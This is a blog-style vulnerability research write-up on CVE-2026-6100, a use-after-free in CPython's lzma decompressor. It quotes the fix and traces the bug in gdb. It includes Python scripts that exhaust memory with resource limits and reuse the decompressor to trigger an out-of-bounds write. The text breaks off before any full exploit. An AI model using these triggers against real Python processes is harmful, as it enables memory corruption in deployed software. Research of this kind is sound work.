scufFed

Exploiting CVE-2026-6100 for Amusement and Misery

6550 words | 31 minutes

So, according to my phone’s screen time statistics, I spend, on average, about 1.5 hours a day on Twitter dot com, usually ranging from 1h to 2h. I open the app up to 125 times a day, with an average of about 90 opens, which means I quite literally spend, on average ($\mu$), about a minute doomscrolling at a time. The data is probably a lot more right-skewed than that, ‘cause there’s definitely moments where I open Twitter for, like, ten seconds, wonder what the hell I’m doing with my life, then close it.

Anyways, the other day I got this tweet on my feed, sandwiched between a 480p recording of Ninajirachi x Porter Robinson’s Wannacry (and that’s a good song title!) and a tweet announcing new Needy Streamer Overload merch:

Fig: The Tweet

I know the words “Python” and “Use-after-free”. I haven’t documented trying to write a CVE PoC before. Let’s see if we can create a full exploit chain with this!

The Bug

The Bug is the pseudonym of Kevin Martin, an extremely prolific UK producer and musician. He was a member of GOD, one of the best jazzcore and industrial metal bands of all time, and under the moniker of The Bug he produces real eclectic grime/hip-hop/industrial/dancehall/dubstep. First time I ever heard of him was that one-off single he made with Death Grips.

Anyway, let’s read the CVE report and try to understand what’s going on.

The CVE Report

The CVE report in full reads as such:

Use-after-free in lzma.LZMADecompressor, bz2.BZ2Decompressor, and gzip.GzipFile after re-use under memory pressure

Use-after-free (UAF) was possible in the lzma.LZMADecompressor, bz2.BZ2Decompressor, and gzip.GzipFile when a memory allocation fails with a MemoryError and the decompression instance is re-used. This scenario can be triggered if the process is under memory pressure. The fix cleans up the dangling pointer in this specific error condition. The vulnerability is only present if the program re-uses decompressor instances across multiple decompression calls even after a MemoryError is raised during decompression. Using the helper functions to one-shot decompress data such as lzma.decompress(), bz2.decompress(), gzip.decompress(), and zlib.decompress() are not affected as a new decompressor instance is used per call. If the decompressor instance is not re-used after an error condition, this usage is similarly not vulnerable.
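To make the “re-use after an error” condition concrete, here’s a minimal sketch of the usage pattern the report calls safe: one decompressor per stream, and the instance is never touched again once it has raised. The helper name decompress_chunks and the 32-byte chunk size are my own illustrative choices, not anything from the advisory or from CPython.

```python
import lzma


def decompress_chunks(chunks):
    """Feed chunks to one decompressor; never reuse it after a MemoryError."""
    decomp = lzma.LZMADecompressor()
    out = bytearray()
    try:
        for chunk in chunks:
            out += decomp.decompress(chunk)
    except MemoryError:
        # On affected builds the instance may hold a stale pointer now,
        # so drop it instead of calling decompress() on it again.
        del decomp
        raise
    return bytes(out)


payload = lzma.compress(b"hello " * 1000)
chunks = [payload[i:i + 32] for i in range(0, len(payload), 32)]
result = decompress_chunks(chunks)
print(len(result))
```

The vulnerable pattern is the opposite: catching the MemoryError and then calling decompress() on the same instance again.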

So, some things to note:

Well, send patches or die, right? Let’s see what the actual fix looks like for the affected modules.

The Fix

Here’s the pull request with the fixes implemented. We’ve got four files changed and… ooh. It really is just a UAF cleanup edit.

Fig: The Fixes

In the three affected decompression modules, there’s just a line added to each of their decompression functions to clear out some next_in field on error. Well, with the limited information that we have, let’s start working backwards through one of them.

LZMA has the coolest name of the bunch, so I’m gonna go with that, naturally.

Understanding _lzmamodule.c

We’re reverse engineers, so we read our code in reverse too!

Let’s start from the very end, the error block that we’re so concerned with:

...
error:
    lzs->next_in = NULL;
    Py_XDECREF(result);
    return NULL;
}

Recall that we’re supposed to hit this error block through a MemoryError of sorts. Looking at our gotos, we’ve got a candidate:

    /* Allocate if necessary */
    if (d->input_buffer == NULL) {
        d->input_buffer = PyMem_Malloc(lzs->avail_in);
        if (d->input_buffer == NULL) {
            PyErr_SetNone(PyExc_MemoryError);
            goto error;
        }
        d->input_buffer_size = lzs->avail_in;
    }

So if we somehow hit the condition of d->input_buffer being NULL, it will trigger a PyMem_Malloc requesting lzs->avail_in bytes, which on failure will raise a MemoryError and jump to the error block. So far, so good. What the fuck are d and lzs?

static PyObject *
decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
{
    char input_buffer_in_use;
    PyObject *result;
    lzma_stream *lzs = &d->lzs;
...

Okay, cool. Decompressor struct and lzma_stream struct. The Decompressor is defined in this file, thankfully:

typedef struct {
    PyObject_HEAD
    lzma_allocator alloc;
    lzma_stream lzs;
    int check;
    char eof;
    PyObject *unused_data;
    char needs_input;
    uint8_t *input_buffer;
    size_t input_buffer_size;
    PyMutex mutex;
} Decompressor;

But our lzma_stream struct isn’t. It comes from lzma.h, which comes from liblzma. Digging around for some source code yields us the following struct:

typedef struct {
	const uint8_t *next_in; /**< Pointer to the next input byte. */
	size_t avail_in;    /**< Number of available input bytes in next_in. */
	uint64_t total_in;  /**< Total number of bytes read by liblzma. */

	uint8_t *next_out;  /**< Pointer to the next output position. */
	size_t avail_out;   /**< Amount of free space in next_out. */
	uint64_t total_out; /**< Total number of bytes written by liblzma. */
	lzma_allocator *allocator;

	/** Internal state is not visible to applications. */
	lzma_internal *internal;
	void *reserved_ptr1;
	void *reserved_ptr2;
	void *reserved_ptr3;
	void *reserved_ptr4;
	uint64_t reserved_int1;
	uint64_t reserved_int2;
	size_t reserved_int3;
	size_t reserved_int4;
	lzma_reserved_enum reserved_enum1;
	lzma_reserved_enum reserved_enum2;

} lzma_stream;

Nice, let’s start tracing the decompress function from the top down to see how to hit our block of interest.

static PyObject *
decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
{
    char input_buffer_in_use;
    PyObject *result;
    lzma_stream *lzs = &d->lzs;

    /* Prepend unconsumed input if necessary */
    if (lzs->next_in != NULL) {
        size_t avail_now, avail_total;

        /* Number of bytes we can append to input buffer */
        avail_now = (d->input_buffer + d->input_buffer_size)
            - (lzs->next_in + lzs->avail_in);
    ...
    /* BLAH BLAH BLAH */
        memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
        lzs->avail_in += len;
        input_buffer_in_use = 1;
    }
    else {
        lzs->next_in = data;
        lzs->avail_in = len;
        input_buffer_in_use = 0;
    }

    result = decompress_buf(d, max_length);
    if (result == NULL) {
        lzs->next_in = NULL;
        return NULL;
    }
...

I’ve glossed over the first block that checks if lzs->next_in != NULL because the comment above it explicitly states “Prepend unconsumed input if necessary”, implying this is unlikely to be called on a first pass. Recall that our vulnerability hinges on a reuse, so the first time the function is called, it probably wouldn’t be trying to handle unconsumed input…? In fact, lzs is probably mostly uninitialised (this assumption will turn out to be true), so the relevant block is just the one where the next_in and avail_in fields are being set.

The Python code that would call this function would look a little like this:

import lzma
decompressor = lzma.LZMADecompressor()
a = decompressor.decompress(b'[data_goes_here]', max_length)

Where data and len are drawn from, well, the data you pass in. This is followed up by a call to decompress_buf, which is the handover function that actually calls lzma_code.

/* Decompress data of length d->lzs.avail_in in d->lzs.next_in.  The output
   buffer is allocated dynamically and returned.  At most max_length bytes are
   returned, so some of the input may not be consumed. d->lzs.next_in and
   d->lzs.avail_in are updated to reflect the consumed input. */
static PyObject*
decompress_buf(Decompressor *d, Py_ssize_t max_length)
{
    PyObject *result;
    lzma_stream *lzs = &d->lzs;
    _BlocksOutputBuffer buffer = {.writer = NULL};
    _lzma_state *state = PyType_GetModuleState(Py_TYPE(d));
    assert(state != NULL);

    if (OutputBuffer_InitAndGrow(&buffer, max_length, &lzs->next_out, &lzs->avail_out) < 0) {
        goto error;
    }

    for (;;) {
        lzma_ret lzret;

        Py_BEGIN_ALLOW_THREADS
        lzret = lzma_code(lzs, LZMA_RUN);
        Py_END_ALLOW_THREADS

        if (lzret == LZMA_BUF_ERROR && lzs->avail_in == 0 && lzs->avail_out > 0) {
            lzret = LZMA_OK; /* That wasn't a real error */
        }
        if (catch_lzma_error(state, lzret)) {
            goto error;
        }
        if (lzret == LZMA_GET_CHECK || lzret == LZMA_NO_CHECK) {
            FT_ATOMIC_STORE_INT_RELAXED(d->check, lzma_get_check(&d->lzs));
        }
        if (lzret == LZMA_STREAM_END) {
            FT_ATOMIC_STORE_CHAR_RELAXED(d->eof, 1);
            break;
        } else if (lzs->avail_out == 0) {
            /* Need to check lzs->avail_out before lzs->avail_in.
               Maybe lzs's internal state still have a few bytes
               can be output, grow the output buffer and continue
               if max_lengh < 0. */
            if (OutputBuffer_GetDataSize(&buffer, lzs->avail_out) == max_length) {
                break;
            }
            if (OutputBuffer_Grow(&buffer, &lzs->next_out, &lzs->avail_out) < 0) {
                goto error;
            }
        } else if (lzs->avail_in == 0) {
            break;
        }
    }

    result = OutputBuffer_Finish(&buffer, lzs->avail_out);
    if (result != NULL) {
        return result;
    }

error:
    OutputBuffer_OnError(&buffer);
    return NULL;
}

We can’t let this function fail (i.e. return NULL), as that’ll kill off the rest of our decompress call (this is called foreshadowing). Additionally, we get a sense for what max_length does here, which the docstring elucidates further:

If max_length is nonnegative, returns at most max_length bytes of decompressed data. If this limit is reached and further output can be produced, self.needs_input will be set to False. In this case, the next call to decompress() may provide data as b'' to obtain more of the output.

So this is how we get our partial decompression: by calling decompress with a max_length value that is shorter than the full decompressed buffer.
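Here’s a small sketch of that partial decompression from the Python side, using the same seven-byte string that shows up in the debugging session later. Nothing here touches the bug; it only uses the documented max_length and needs_input behaviour. The variable names are mine.

```python
import lzma

plain = b"asdfgda"
packed = lzma.compress(plain)

decomp = lzma.LZMADecompressor()
first = decomp.decompress(packed, max_length=1)  # ask for one byte only
wants_more_input = decomp.needs_input             # False: output is still pending
rest = decomp.decompress(b"")                     # drain without feeding new input

print(first, wants_more_input, rest, decomp.eof)
```

The interesting part is the state between the two calls: the decompressor is sitting on leftover input that it has to keep somewhere, which is exactly the bookkeeping the rest of this post pokes at.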

Looking at the if blocks that come after, we can see what conditions we need to miss:

    if (d->eof) {
        FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 0);
        if (lzs->avail_in > 0) {
            PyObject *unused_data = PyBytes_FromStringAndSize(
                (char *)lzs->next_in, lzs->avail_in);
            if (unused_data == NULL) {
                goto error;
            }
            Py_XSETREF(d->unused_data, unused_data);
        }
    }
    else if (lzs->avail_in == 0) {
        lzs->next_in = NULL;

        if (lzs->avail_out == 0) {
            /* (avail_in==0 && avail_out==0)
               Maybe lzs's internal state still have a few bytes can
               be output, try to output them next time. */
            FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 0);

            /* If max_length < 0, lzs->avail_out always > 0 */
            assert(max_length >= 0);
        } else {
            /* Input buffer exhausted, output buffer has space. */
            FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 1);
        }
    }
    else {
        // the actual block we want to hit
    ...

So we can’t allow d->eof to be set high. This only happens in decompress_buf if lzret == LZMA_STREAM_END, so we will pass by this easily since we’re not consuming the full stream.

Similarly, we coast past lzs->avail_in == 0 as we intentionally leave some residual data, so these if blocks aren’t really a problem.

Now, what happens when you call the function again? Before the patch, the lzs->next_in field doesn’t get NULLd out. We know that this will contain a pointer to our input data of sorts (does it get advanced or modified during the call to lzma_code? Easiest way to find out is by debugging later!), so let’s actually trace the non-NULL block of decompress now:

    if (lzs->next_in != NULL) {
        size_t avail_now, avail_total;

        /* Number of bytes we can append to input buffer */
        avail_now = (d->input_buffer + d->input_buffer_size)
            - (lzs->next_in + lzs->avail_in);

        /* Number of bytes we can append if we move existing
           contents to beginning of buffer (overwriting
           consumed input) */
        avail_total = d->input_buffer_size - lzs->avail_in;

        if (avail_total < len) {
            size_t offset = lzs->next_in - d->input_buffer;
            uint8_t *tmp;
            size_t new_size = d->input_buffer_size + len - avail_now;

            /* Assign to temporary variable first, so we don't
               lose address of allocated buffer if realloc fails */
            tmp = PyMem_Realloc(d->input_buffer, new_size);
            if (tmp == NULL) {
                PyErr_SetNone(PyExc_MemoryError);
                return NULL;
            }
            d->input_buffer = tmp;
            d->input_buffer_size = new_size;

            lzs->next_in = d->input_buffer + offset;
        }
        else if (avail_now < len) {
            memmove(d->input_buffer, lzs->next_in,
                    lzs->avail_in);
            lzs->next_in = d->input_buffer;
        }
        memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
        lzs->avail_in += len;
        input_buffer_in_use = 1;
    }

Eyeballing this, we can see where the OOB Write is. It’s probably all the way down at the end, with that pesky memcpy. We have a dangling pointer to data (or something related) since we never cleared out lzs->next_in, and now it will copy whatever new data we’re passing in to an address past that. If next_in and avail_in are untouched by the previous call, we actually just get a direct OOB Write to whatever memory lies right after the original data!
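If the control flow is hard to hold in your head, here’s a pure-Python toy model of it. To be loud about it: this is not CPython’s code. ToyStream, toy_decompress and run are hypothetical names, the “heap” is just a bytearray with offsets standing in for pointers, and the realloc/memmove branches are left out entirely. It only models the stale next_in surviving a failed allocation, and what the one-line fix changes.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class ToyStream:
    next_in: Optional[int] = None  # offset into the toy heap; None plays NULL
    avail_in: int = 0


def toy_decompress(heap, lzs, data_off, length, consumed, malloc_fails, patched):
    if lzs.next_in is not None:
        # "Prepend unconsumed input" branch: append right after the old input
        dst = lzs.next_in + lzs.avail_in
        heap[dst:dst + length] = heap[data_off:data_off + length]
        lzs.avail_in += length
        return
    # Fresh call: point straight at the caller's buffer
    lzs.next_in, lzs.avail_in = data_off, length
    # Stand-in for decompress_buf() eating part of the input
    lzs.next_in += consumed
    lzs.avail_in -= consumed
    if lzs.avail_in > 0 and malloc_fails:
        if patched:
            lzs.next_in = None  # the one-line fix
        raise MemoryError


def run(patched):
    heap = bytearray(48)
    heap[0:16] = b"C" * 16    # caller's compressed input
    heap[16:32] = b"V" * 16   # unrelated neighbour (the "victim")
    heap[32:36] = b"AAAA"     # input for the second call
    lzs = ToyStream()
    try:
        toy_decompress(heap, lzs, 0, 16, 4, True, patched)
    except MemoryError:
        pass
    toy_decompress(heap, lzs, 32, 4, 0, False, patched)
    return bytes(heap[16:32])


print(run(patched=False))  # b'AAAAVVVVVVVVVVVV'
print(run(patched=True))   # b'VVVVVVVVVVVVVVVV'
```

In the unpatched run the second call writes at next_in + avail_in, which is one byte past the end of the first call’s input, so the neighbour gets clobbered.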

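Okay, so we’ve got a rough idea of what’s going on. Pretty straightforward, too: partially decompress so that some input is left over, get that PyMem_Malloc to fail, catch the MemoryError, then call decompress again and let the memcpy write past the stale pointer.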

So, shall we?

Pressure Torture

On Venetian Snares’ album “Doll Doll Doll”, there’s a track called “Pressure Torture”. It’s a 7:49 minute track of pummelling snares, bass strikes and, of course, utterly fucked up chopped Amen Breaks. It’s music made to beat you up; hardly for pleasure, hardly for enjoyment.

Anyways, we need to somehow get PyMem_Malloc to fail. The CVE report gives us a clue: “This scenario can be triggered if the process is under memory pressure.”.

Let’s do a little bit of debugging to figure out how we can attain that pressure.

Tracing the decompress Call

I am a staunch believer that you don’t always need symbols during debugging. If you’re good, you should just be able to eyeball the structs and see where the data should be without needing text all over the fucking place.

However, I decided to give in for once and compiled the last Python commit prior to this patch (480edc1aae0) in debug mode by throwing in a nifty little ./configure --with-pydebug CFLAGS="-g3 -O0". Blasphemous.

Let’s write a simple script to test the decompress function:

import lzma

decompressor = lzma.LZMADecompressor()

# we need to start with some valid data at first, at least
t = bytearray(b'asdfgda')
t = lzma.compress(t)
a = decompressor.decompress(t, 1)

We can then set a breakpoint in gdb by calling b ../Modules/_lzmamodule.c:decompress to begin tracing.

─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b2d0db <decompress+000c> mov    QWORD PTR [rbp-0x70], rsi
   0x7ffff7b2d0df <decompress+0010> mov    QWORD PTR [rbp-0x78], rdx
   0x7ffff7b2d0e3 <decompress+0014> mov    QWORD PTR [rbp-0x80], rcx
●→ 0x7ffff7b2d0e7 <decompress+0018> mov    rax, QWORD PTR [rbp-0x68]
   0x7ffff7b2d0eb <decompress+001c> add    rax, 0x28
   0x7ffff7b2d0ef <decompress+0020> mov    QWORD PTR [rbp-0x50], rax
   0x7ffff7b2d0f3 <decompress+0024> mov    rax, QWORD PTR [rbp-0x50]
   0x7ffff7b2d0f7 <decompress+0028> mov    rax, QWORD PTR [rax]
   0x7ffff7b2d0fa <decompress+002b> test   rax, rax
─────────────────────────────────────────────────────────── source:../Modules/_lzmamodule.c+988 ────
    983	 static PyObject *
    984	 decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
    985	 {
    986	     char input_buffer_in_use;
    987	     PyObject *result;
             // d=0x00007fffffff9ea8  →  [...]  →  0x0000000000000002, lzs=0x00007fffffff9ec0  →  0x0000000001000000
 →  988	     lzma_stream *lzs = &d->lzs;
    989	
    990	     /* Prepend unconsumed input if necessary */
    991	     if (lzs->next_in != NULL) {
    992	         size_t avail_now, avail_total;
    993	
─────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "python", stopped 0x7ffff7b2d0e7 in decompress (), reason: BREAKPOINT

Here we can start checking off some of our assumptions. Stepping a little then pretty printing the lzma_stream struct at this point shows us it is, in fact, largely uninitialized:

gef➤  print *(lzma_stream *) 0x00007ffff7c2e468
$3 = {
  next_in = 0x0,
  avail_in = 0x0,
  total_in = 0x0,
  next_out = 0x0,
  avail_out = 0x0,
  total_out = 0x0,
  allocator = 0x7ffff7c2e450,
  internal = 0x555555ec8a10,
  reserved_ptr1 = 0x0,
  reserved_ptr2 = 0x0,
  reserved_ptr3 = 0x0,
  reserved_ptr4 = 0x0,
  seek_pos = 0x0,
  reserved_int2 = 0x0,
  reserved_int3 = 0x0,
  reserved_int4 = 0x0,
  reserved_enum1 = LZMA_RESERVED_ENUM,
  reserved_enum2 = LZMA_RESERVED_ENUM
}

and it will get filled in with our input compressed data once we go further in:

─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b2d29d <decompress+01ce> mov    rax, QWORD PTR [rbp-0x50]
   0x7ffff7b2d2a1 <decompress+01d2> mov    rdx, QWORD PTR [rbp-0x78]
   0x7ffff7b2d2a5 <decompress+01d6> mov    QWORD PTR [rax+0x8], rdx
 → 0x7ffff7b2d2a9 <decompress+01da> mov    BYTE PTR [rbp-0x51], 0x0
   0x7ffff7b2d2ad <decompress+01de> mov    rdx, QWORD PTR [rbp-0x80]
   0x7ffff7b2d2b1 <decompress+01e2> mov    rax, QWORD PTR [rbp-0x68]
   0x7ffff7b2d2b5 <decompress+01e6> mov    rsi, rdx
   0x7ffff7b2d2b8 <decompress+01e9> mov    rdi, rax
   0x7ffff7b2d2bb <decompress+01ec> call   0x7ffff7b2cec7 <decompress_buf>
────────────────────────────────────────────────────────── source:../Modules/_lzmamodule.c+1032 ────
   1027	         input_buffer_in_use = 1;
   1028	     }
   1029	     else {
   1030	         lzs->next_in = data;
   1031	         lzs->avail_in = len;
                 // input_buffer_in_use=0x0
 → 1032	         input_buffer_in_use = 0;
   1033	     }
   1034	
   1035	     result = decompress_buf(d, max_length);
   1036	     if (result == NULL) {
   1037	         lzs->next_in = NULL;
...
────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤  print *(lzma_stream *) 0x00007ffff7c2e468
$4 = {
  next_in = 0x7ffff77b9ce0 "\3757zXZ",
  avail_in = 0x40,
  total_in = 0x0,
  next_out = 0x0,
  avail_out = 0x0,
...

We continue execution past decompress_buf to see how this changes our structs:

─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b2d2b5 <decompress+01e6> mov    rsi, rdx
   0x7ffff7b2d2b8 <decompress+01e9> mov    rdi, rax
   0x7ffff7b2d2bb <decompress+01ec> call   0x7ffff7b2cec7 <decompress_buf>
●→ 0x7ffff7b2d2c0 <decompress+01f1> mov    QWORD PTR [rbp-0x20], rax
   0x7ffff7b2d2c4 <decompress+01f5> cmp    QWORD PTR [rbp-0x20], 0x0
   0x7ffff7b2d2c9 <decompress+01fa> jne    0x7ffff7b2d2e0 <decompress+529>
   0x7ffff7b2d2cb <decompress+01fc> mov    rax, QWORD PTR [rbp-0x50]
   0x7ffff7b2d2cf <decompress+0200> mov    QWORD PTR [rax], 0x0
   0x7ffff7b2d2d6 <decompress+0207> mov    eax, 0x0
...
gef➤  print *(Decompressor *)0x00007fffffff9ea8
$5 = {
  ob_base = {
    {
      ob_refcnt_full = 0x7ffff7c2e440,
      {
        ob_refcnt = 0xf7c2e440,
        ob_overflow = 0x7fff,
        ob_flags = 0x0
      },
      _aligner = 0x40
    },
    ob_type = 0x7fffffff9ed0
  },
...
  check = 0xf7b2c04f,
  eof = 0xff,
  unused_data = 0x0,
  needs_input = 0x2,
  input_buffer = 0x7fffffffa1c0 "\300\234{\367\377\177",
  input_buffer_size = 0x7ffff7c2e440,
  mutex = {
    _bits = 0xa0
  }
}
gef➤  print *(lzma_stream *)0x7ffff7c2e468
$7 = {
  next_in = 0x7ffff77b9cfc "sdfgda",
  avail_in = 0x24,
  total_in = 0x1c,
  next_out = 0x7ffff7bd1341 "",
  avail_out = 0x0,
  total_out = 0x1,
  allocator = 0x7ffff7c2e450,
  internal = 0x555555ec8a10,
  reserved_ptr1 = 0x0,
  reserved_ptr2 = 0x0,
  reserved_ptr3 = 0x0,
  reserved_ptr4 = 0x0,
  seek_pos = 0x0,
  reserved_int2 = 0x0,
  reserved_int3 = 0x0,
  reserved_int4 = 0x0,
  reserved_enum1 = LZMA_RESERVED_ENUM,
  reserved_enum2 = LZMA_RESERVED_ENUM
}

Note that next_in now points at what looks like the rest of our data in plaintext. My best guess is that a string this short isn’t worth compressing, so the xz container just stores it raw and next_in is sitting in the middle of that stored chunk. Notice the changes to avail_in, total_in, avail_out, and total_out too. total_out directly reflects the amount of data we requested, while total_in goes up by 0x1c as that’s the length we’ve ingested (and thus incremented next_in by).

Also, notice how d->eof remains at 0xff and lzs->avail_in is non-zero, which means we will very cleanly fall into our target if block to trigger the bug!
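A quick way to sanity-check those struct values without gdb. The hex constants are copied straight from the two dumps above; the last check leans on my assumption that the xz encoder stores a string this short as a raw chunk, which is why the leftover input looks like plaintext.

```python
import lzma

plain = b"asdfgda"
packed = lzma.compress(plain)

# Numbers copied from the gdb dumps before and after decompress_buf()
next_in_before, avail_in_before = 0x7FFFF77B9CE0, 0x40
next_in_after, avail_in_after, total_in = 0x7FFFF77B9CFC, 0x24, 0x1C

pointer_advance = next_in_after - next_in_before
bytes_left = avail_in_before - total_in

# Is the plaintext sitting verbatim inside the .xz container?
stored_raw = plain in packed

print(len(packed), hex(pointer_advance), hex(bytes_left), stored_raw)
```

So next_in moved forward by exactly total_in, and avail_in shrank by the same amount, which is the bookkeeping you’d expect from a stream that’s been partially read.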

Making PyMem_Malloc Fail

So this is the annoying bit. Intuitively, a malloc operation would only fail if for some reason, the program is unable to serve the amount of free memory requested in that malloc request. It seems unlikely that during decompression we somehow manage to assign an obscene length to lzs->avail_in, nor would there be a way to restore it to a reasonable value afterwards.

This is where the earlier statement on “memory pressure” comes in. If we manage to get the program to be in a memory exhausted state with a sufficiently fractured heap, then even a “smaller” allocation request for something like, I dunno, a megabyte? would fail.

So we need to tune our resource allocation in such a way that there’s enough free memory for everything (that is, up till decompress_buf returning) to carry on with no errors, but the moment we hit that PyMem_Malloc the program goes kaput.

We can artificially restrict the resource limits of a Python script with the following:

import resource

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = 64 * 1024 * 1024 # 64 MB

# this will set a 64 MB memory cap on the program
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit)) 

# this will restore the original resources
resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit)) 
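Since we’ll be flipping this cap on and off a lot, a context manager is a tidy way to wrap it. This is a sketch under a couple of assumptions: address_space_cap is a name I made up, it assumes Linux (where RLIMIT_AS is actually enforced), and the 512 MiB / 1 GiB sizes are arbitrary demo values rather than the tuned limit used for the exploit. It only lowers the soft limit, since an unprivileged process can’t raise a hard limit back up.

```python
import resource
from contextlib import contextmanager


@contextmanager
def address_space_cap(max_bytes: int):
    """Temporarily lower the soft RLIMIT_AS; the hard limit is left alone."""
    soft, hard = resource.getrlimit(resource.RLIMIT_AS)
    if hard != resource.RLIM_INFINITY:
        max_bytes = min(max_bytes, hard)  # soft may never exceed hard
    resource.setrlimit(resource.RLIMIT_AS, (max_bytes, hard))
    try:
        yield
    finally:
        resource.setrlimit(resource.RLIMIT_AS, (soft, hard))


original_limits = resource.getrlimit(resource.RLIMIT_AS)
hit_memory_error = False
with address_space_cap(512 * 1024 * 1024):   # 512 MiB cap
    try:
        bytearray(1024 * 1024 * 1024)        # a 1 GiB request cannot fit
    except MemoryError:
        hit_memory_error = True

restored = resource.getrlimit(resource.RLIMIT_AS) == original_limits
print(hit_memory_error, restored)
```

The finally block matters more than it looks: without it, everything after the failed allocation keeps running under the cap.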

We can now experiment with our limits a bit. I compress some high entropy data (i.e. I ran lzma.compress(os.urandom(2*1024*1024))), which creates both a large compressed buffer and a large uncompressed buffer. Then, we just start playing around with our resource limits until we hit something nice.
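For reference, this is roughly how such a payload can be generated, and why random bytes are the right input: they don’t compress, so the compressed buffer ends up about as big as the raw one. I’ve scaled it down to 64 KiB here so it runs instantly; the size is my choice for the sketch.

```python
import lzma
import os

raw = os.urandom(64 * 1024)   # scaled down from the 2 MB used in the post
packed = lzma.compress(raw)

ratio = len(packed) / len(raw)
print(f"{len(raw)} raw bytes -> {len(packed)} compressed bytes (ratio {ratio:.3f})")
```

A big compressed buffer is what we’re after, since lzs->avail_in (and therefore the size of the PyMem_Malloc we want to fail) scales with the amount of unconsumed input.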

import resource
import lzma

# simulate memory exhaustion
limit = int(33 * 1024 * 1024) # by the scientific method we arrive at this to be our limit
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
print(f"cap mem at {limit / 1024 / 1024} MB")

c = b'\xfd7zXZ\x00\x00\x04...' # our 2 MB buffer
decompressor = lzma.LZMADecompressor()
a = decompressor.decompress(c, 1)

This is juuuuust nice. We manage to make it through decompress_buf without it dying there, and we hit the error path that we want.

[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x0
$rbx   : 0x00007ffff7c555dc  →  0x0a73000000000001
$rcx   : 0x0
$rdx   : 0xffffffffffffff80
...
─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b2644f <decompress+0380> mov    rax, QWORD PTR [rax+0x8]
   0x7ffff7b26453 <decompress+0384> mov    rdi, rax
   0x7ffff7b26456 <decompress+0387> call   0x7ffff7b234b0 <PyMem_Malloc@plt>
●→ 0x7ffff7b2645b <decompress+038c> mov    rdx, QWORD PTR [rbp-0x68]
   0x7ffff7b2645f <decompress+0390> mov    QWORD PTR [rdx+0xc8], rax
   0x7ffff7b26466 <decompress+0397> mov    rax, QWORD PTR [rbp-0x68]
   0x7ffff7b2646a <decompress+039b> mov    rax, QWORD PTR [rax+0xc8]
   0x7ffff7b26471 <decompress+03a2> test   rax, rax
   0x7ffff7b26474 <decompress+03a5> jne    0x7ffff7b2648a <decompress+955>
...

Notice how $rax is 0x0 following the PyMem_Malloc call, implying it failed and we will fall through to our error block, which we do!

─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b264d4 <decompress+0405> mov    rax, QWORD PTR [rbp-0x20]
   0x7ffff7b264d8 <decompress+0409> jmp    0x7ffff7b264ec <decompress+1053>
   0x7ffff7b264da <decompress+040b> nop    
 → 0x7ffff7b264db <decompress+040c> mov    rax, QWORD PTR [rbp-0x20]
   0x7ffff7b264df <decompress+0410> mov    rdi, rax
   0x7ffff7b264e2 <decompress+0413> call   0x7ffff7b2393d <Py_XDECREF>
   0x7ffff7b264e7 <decompress+0418> mov    eax, 0x0
   0x7ffff7b264ec <decompress+041d> leave
   0x7ffff7b264ed <decompress+041e> ret
────────────────────────────────────────────────────────── source:../Modules/_lzmamodule.c+1103 ────
   1098	     }
   1099	 
   1100	     return result;
   1101	 
   1102	 error:
             // result=0x00007fffffff9ef0  →  [...]  →  <_PyRuntime+10e80> add BYTE PTR [rax], al
 → 1103	     Py_XDECREF(result);
   1104	     return NULL;
   1105	 }
   1106	
   1107	 /*[clinic input]
   1108	 @permit_long_docstring_body

Purrrrrfect. This was done through just trial and error, and for reasons that’ll become apparent later, we’re going to need better methods. Either way, we get our PyMem_Malloc failure here, so triggering the bug should be trivial from here!

Triggering the Bug

As we’ve figured out, we need to catch our MemoryError that decompress will throw, then call decompress one more time with some input data which should get memcpy’d OOB. Let’s update our script to reflect this:

import resource
import lzma

# remember the original limits so we can restore them after the bug fires
soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

# simulate memory exhaustion
limit = int(33 * 1024 * 1024) # by the scientific method we arrive at this to be our limit
# only lower the soft limit: a lowered hard limit can't be raised back without privileges
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))
print(f"cap mem at {limit / 1024 / 1024} MB")

# our memory budget is very tight at this point
c = b'\xfd7zXZ\x00\x00\x04...' # our 2 MB buffer
decompressor = lzma.LZMADecompressor()
a = None

try:
    input(f"Decompressor is at {hex(id(decompressor))}")
    a = decompressor.decompress(c, 1)
except MemoryError:
    pass
finally:
    # restore our resources so we struggle less post-bug
    resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))

input("MemError triggered, decompressing again")
a = decompressor.decompress(b'A'*16, 1)

We now just step through our script in gdb and see what happens on the decompress calls! After falling through to the error block in the first call, we can check what our lzma_stream struct looks like, knowing that it doesn’t get cleared out properly:

─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b264e2 <decompress+0413> call   0x7ffff7b2393d <Py_XDECREF>
   0x7ffff7b264e7 <decompress+0418> mov    eax, 0x0
   0x7ffff7b264ec <decompress+041d> leave  
 → 0x7ffff7b264ed <decompress+041e> ret    
...
gef➤  print *(lzma_stream *)0x7ffff7c2e468
$13 = {
  next_in = 0x7ffff6bda06c "\020J\022_%\"\024\377\017\276\226dwW*\3568\330&...,
  avail_in = 0x100054,
  total_in = 0x1c,
  next_out = 0x7ffff7bd1341 "",
  avail_out = 0x0,
  total_out = 0x1,
  allocator = 0x7ffff7c2e450,
